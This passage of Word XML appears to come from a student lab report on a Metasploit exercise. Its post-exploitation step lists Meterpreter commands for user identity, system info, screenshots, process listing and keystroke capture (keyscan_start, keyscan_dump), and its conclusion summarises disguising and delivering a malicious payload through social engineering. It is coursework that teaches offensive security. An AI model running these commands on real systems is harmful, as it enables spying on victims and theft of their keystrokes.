          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 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>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D75A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803AAA1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From Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5AA0B" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Checked user identity: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="774953BD" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Retrieved system info: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="531E81A7" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Took a screenshot: </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00460193" w14:textId="5FE48F65" w:rsidR="003830FF" w:rsidRDefault="00453074" w:rsidP="003830FF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 xml:space="preserve">Viewed running processes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="545C2A58" w14:textId="39F112B3" w:rsidR="003830FF" w:rsidRPr="003830FF" w:rsidRDefault="003830FF" w:rsidP="003830FF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3830FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Captured keystrokes using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003830FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>keyscan_start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 w:rsidRPr="003830FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="734B2422" w14:textId="42ED5CBA" w:rsidR="0022155B" w:rsidRPr="00453074" w:rsidRDefault="0022155B" w:rsidP="0022155B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A81A99" wp14:editId="7CDDFAF7">
            <wp:extent cx="4910839" cy="2930236"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="1984879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93" name="Picture 11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9863" b="7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712" cy="294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5131" w14:textId="0DB5C063" w:rsidR="0022155B" w:rsidRDefault="00453074" w:rsidP="0022155B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 w:rsidR="0022155B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.a</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0022155B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Post exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B871CA4" w14:textId="184DB812" w:rsidR="0022155B" w:rsidRDefault="0022155B" w:rsidP="0022155B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1BF38FDD" wp14:editId="10A2598E">
            <wp:extent cx="4975225" cy="2978727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23002292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2928" name="Picture 12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5" t="9669" b="7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356" cy="297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8568" w14:textId="6AD9B466" w:rsidR="0022155B" w:rsidRPr="00453074" w:rsidRDefault="0022155B" w:rsidP="0022155B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53074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.b</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074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Post exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20989CF5" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00000000" w:rsidP="00453074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2C851BD">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA1429" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="0045307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3074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7874225D" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="003830F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53074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This assignment successfully demonstrated the end-to-end workflow of delivering a malicious payload through social engineering. It covered payload creation, encoding, disguise, and delivery via browser. Real-world issues like file extension handling, network access, and user privilege constraints were encountered and resolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA4971F" w14:textId="77777777" w:rsidR="009C76C9" w:rsidRPr="00453074" w:rsidRDefault="009C76C9" w:rsidP="00453074">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009C76C9" w:rsidRPr="004530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35F6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7510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90364"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A720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44146"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD0AD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2458BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B9E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81186E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEA4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877711"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36C2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1004372">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="883954407">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1172186675">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="437943140">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1271620301">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="11341310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6C9"/>
    <w:rsid w:val="0022155B"/>
    <w:rsid w:val="003830FF"/>
    <w:rsid w:val="00453074"/>
    <w:rsid w:val="0048364B"/>
    <w:rsid w:val="005061CD"/>
    <w:rsid w:val="00596AE0"/>
    <w:rsid w:val="00645761"/>
    <w:rsid w:val="007116D4"/>
    <w:rsid w:val="0077514A"/>
    <w:rsid w:val="009052E8"/>
    <w:rsid w:val="00932C3C"/>
    <w:rsid w:val="009C76C9"/>
    <w:rsid w:val="00BA44E2"/>
    <w:rsid w:val="00D7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3C6EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D17736DC-6AAA-4A27-A902-CE4F2C434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6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7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6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6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6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6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C76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6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6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6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6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6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6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6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6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6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6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6C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5307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3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5307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96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2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Kondekar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Shruti Kondekar</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-03T16:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>